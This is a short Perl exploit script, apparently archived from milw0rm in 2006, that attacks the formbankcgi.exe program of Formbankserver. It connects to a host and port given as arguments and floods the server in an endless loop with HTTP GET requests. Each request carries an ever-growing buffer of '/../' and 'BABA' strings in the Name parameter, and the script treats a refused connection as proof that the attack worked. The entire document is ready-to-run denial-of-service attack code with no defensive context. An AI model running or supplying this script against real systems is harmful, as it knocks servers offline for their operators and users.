43 lines
No EOL
1 KiB
Perl
Executable file
43 lines
No EOL
1 KiB
Perl
Executable file
#!perl
|
|
#Vulnerability found by Bl0od3r
|
|
#visit http://dc3.dl.am to see more exploits
|
|
#http://www.fersch.de/formbankserver/
|
|
#download:http://www.download-tipp.de/cgi-bin/jump.cgi?ID=8796
|
|
- Hide quoted text -
|
|
use IO::Socket;
|
|
use warnings;
|
|
package exploit;
|
|
sub new { bless {} }
|
|
sub bar {
|
|
my $self = shift;
|
|
$self->{host}=$ARGV[0];
|
|
$self->{port}=$ARGV[1];
|
|
&start;
|
|
}
|
|
my $attack = exploit->new();
|
|
$attack->bar();
|
|
|
|
|
|
sub error() {
|
|
print("Connection Refused.Check the host now.It seems like its successfully attacked.");
|
|
}
|
|
|
|
sub start() {
|
|
$host=$ARGV[0];
|
|
$port=$ARGV[1];
|
|
$buff="/../" x 999;
|
|
die("No Host.") unless($host);
|
|
die("No Port.") unless($port);
|
|
for ($i=0;$i<99999;$i++) {
|
|
while () {
|
|
$buff.="BABA";
|
|
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || &error();
|
|
syswrite STDOUT,"+";
|
|
print $sock "GET /cgi-bin/formbankcgi.exe/Abfrage?Name=".$buff." HTTP/1.1\n";
|
|
print $sock "Connection: close\n\n";
|
|
syswrite STDOUT,"+";
|
|
}
|
|
}
|
|
}
|
|
|
|
# milw0rm.com [2006-12-31] |